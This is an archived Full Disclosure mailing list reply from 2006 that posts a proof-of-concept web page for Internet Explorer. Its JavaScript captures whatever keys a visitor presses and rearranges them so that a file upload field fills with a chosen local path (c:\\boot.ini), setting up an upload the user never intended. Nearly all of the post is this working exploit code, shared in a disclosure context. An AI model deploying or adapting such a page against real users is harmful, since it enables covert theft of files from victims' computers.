Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: file upload widgets in IE and Firefox have issues

From: Bart van Arnhem <obliv () gmx net>
Date: Thu, 08 Jun 2006 18:29:21 +0200
Here is another proof of concept for IE only, it allows the characters to be entered in a arbitrary order, since it repositions the caret to make the characters drop in the right place. 
Just open this HTML in IE and bash on the keyboard a bit.

- Bart

<html>
   <head>
       <script type="text/javascript">
           var targetFile = "c:\\boot.ini";
window.onload = function () 
           {
               tempFilled = new Array(targetFile.length + 1).join("\x01");
               tempDone = targetFile.toUpperCase();
document.getElementById("target").onkeyup = function () { this.blur(); }; 

               document.getElementById("target").onkeypress = function (e)
               {
                   if (!e) e = window.event;
var pressed = String.fromCharCode(e.keyCode).toUpperCase(); if ((origPos = tempDone.indexOf(pressed)) !== -1) 
                   {
tempFilled = tempFilled.substr(0, origPos) + pressed + tempFilled.substr(origPos + 1); 
                       tempDone = tempDone.replace(pressed, "\x01");
var matches = tempFilled.substr(0, origPos).match(/\x01/g); tempPos = origPos - (matches == null ? 0 : matches.length);
var range = document.getElementById("target").createTextRange(); 
                       range.collapse(true);
                       range.move("character", tempPos);
                       range.select();

                       return true;
                   }

                   return false;
               }
document.onkeydown = function () { document.getElementById("target").focus() }; 

           }
</script> </head> 
   <body>
       <form method="post" action="">
           <input type="file" id="target" />
       </form>
   </body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: